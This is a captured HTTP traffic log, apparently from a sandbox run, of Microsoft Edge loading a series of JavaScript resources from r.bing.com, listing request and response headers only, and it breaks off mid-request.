user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:39:06 GMT
etag: 0x8DCDC6396975487
content-length: 7069
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yrT84kD84PN8304R0Pvg0w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81fda646-101e-0027-201d-1770d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=168827
expires: Sat, 19 Oct 2024 19:57:32 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4006
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:12:13 GMT
etag: 0x8DCDC5FD53B2D55
content-length: 140
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zk7Mu+IZ+1Afv84KFZt8XQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e49a919d-b01e-0021-56c5-1787a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=131843
expires: Sat, 19 Oct 2024 09:41:08 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4007
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ZROPcAEhbj2oVXAWpOfdV-3E98k.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/ZROPcAEhbj2oVXAWpOfdV-3E98k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:35:45 GMT
etag: 0x8DCDC631EE7C495
content-type: text/javascript; charset=utf-8
content-md5: XDB88L/1tOMJK/y+pV86vg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: efe55695-301e-0056-7b44-1802e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1727
vary: Accept-Encoding
cache-control: public, no-transform, max-age=78569
expires: Fri, 18 Oct 2024 18:53:14 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4032
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:53:26 GMT
etag: 0x8DCDC5D351B0B64
content-length: 626
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6Xn7G4GYLjqWVjZYfi42LQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 942ab205-401e-0070-59f5-179954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=285300
expires: Mon, 21 Oct 2024 04:18:45 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4034
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/910ptS3pcIDQ7a5acMaHuQliuN0.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/910ptS3pcIDQ7a5acMaHuQliuN0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:54:04 GMT
etag: 0x8DCDC5D4C2FB005
content-type: text/javascript; charset=utf-8
content-md5: eh63mOkIBbFjgAwCOpOf1w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: af804365-b01e-0003-36c0-15e997000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 854
vary: Accept-Encoding
cache-control: public, no-transform, max-age=393580
expires: Tue, 22 Oct 2024 10:23:25 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4035
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: fr82fvtvcsicFIwsSPlj7g==
last-modified: Tue, 24 Sep 2024 06:17:19 GMT
etag: 0x8DCDC608BA54CA4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 602e271b-401e-0034-26ec-154538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 487
vary: Accept-Encoding
cache-control: public, no-transform, max-age=399204
expires: Tue, 22 Oct 2024 11:57:09 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4036
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6t/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rs/6t/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 241
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 23 Sep 2024 23:41:33 GMT
x-eventid: 671054a73d694f0d84d2b40d8e74c7a1
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E04C
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-C77mCGVJyCi/WqNT9nuQyXzet1HLheBRBUZ6t20E7Z8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=356572
expires: Tue, 22 Oct 2024 00:06:37 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4037
timing-allow-origin: *
GET

https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 174
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: +jWBJey2nJqR+pG7G7E28A==
last-modified: Tue, 24 Sep 2024 06:46:13 GMT
etag: 0x8DCDC6494C9BF9A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7fcf8c82-301e-003b-4d01-17a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=128144
expires: Sat, 19 Oct 2024 08:39:29 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4038
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:56:27 GMT
etag: 0x8DCDC66034C9278
content-length: 507
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Tm502hkAmxWuxzxBM7uX9A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f848f133-f01e-0062-47bc-17ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=223207
expires: Sun, 20 Oct 2024 11:03:52 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4039
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 375
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kdgVpI0X+oWcnOv0ZCUuIA==
last-modified: Tue, 24 Sep 2024 05:51:04 GMT
etag: 0x8DCDC5CE09E00D2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 40b94707-101e-0027-33eb-1470d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=173605
expires: Sat, 19 Oct 2024 21:17:10 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 490
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3vstlq/a5ZcE98e8La1vPw==
last-modified: Tue, 24 Sep 2024 06:50:43 GMT
etag: 0x8DCDC6535F306CD
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 09ff7c48-201e-0024-6697-1673de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=250842
expires: Sun, 20 Oct 2024 18:44:27 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:28:19 GMT
etag: 0x8DCDC62149C3678
content-length: 386
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6W4GJTTFhKoLN+eXDWPo3Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e335d78d-401e-0052-2671-15f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=50925
expires: Fri, 18 Oct 2024 11:12:30 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TA5w4JZB_Bofmi4E2NA9kDEyusQ.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/TA5w4JZB_Bofmi4E2NA9kDEyusQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:25:50 GMT
etag: 0x8DCDC61BC3A6D83
content-length: 218
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Nxjfu3FuQxhf33rq+sYskQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: df21f994-101e-002c-796b-1568ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=347135
expires: Mon, 21 Oct 2024 21:29:20 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:16:51 GMT
etag: 0x8DCDC68DCA5DDA0
content-type: text/javascript; charset=utf-8
content-md5: wMjND6gwy3LKsXBo8Ww74w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce25302a-c01e-002e-0401-156a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 481
vary: Accept-Encoding
cache-control: public, no-transform, max-age=297070
expires: Mon, 21 Oct 2024 07:34:55 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/jA1xMqBzlpnpE2ru1-s0ybbi8MM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/jA1xMqBzlpnpE2ru1-s0ybbi8MM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:51:44 GMT
etag: 0x8DCDC655A8820C3
content-type: text/javascript; charset=utf-8
content-md5: OuXcJlOLJ5YKncHzThxbVw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a43c6885-e01e-005f-0aa4-16186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 11731
vary: Accept-Encoding
cache-control: public, no-transform, max-age=122762
expires: Sat, 19 Oct 2024 07:09:47 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac403f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/hkXWsTcGTHs44QxzZyThd4fbbPM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/hkXWsTcGTHs44QxzZyThd4fbbPM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: cQ12N8x+IbYv0+/mq6H9Jw==
last-modified: Tue, 24 Sep 2024 06:49:48 GMT
etag: 0x8DCDC651552FCB4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 149cdd7a-701e-0078-0641-168227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 66669
vary: Accept-Encoding
cache-control: public, no-transform, max-age=45643
expires: Fri, 18 Oct 2024 09:44:28 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4040
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/EcPZJcvBpS1TWE_YYG-PcTqlkRQ.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/EcPZJcvBpS1TWE_YYG-PcTqlkRQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
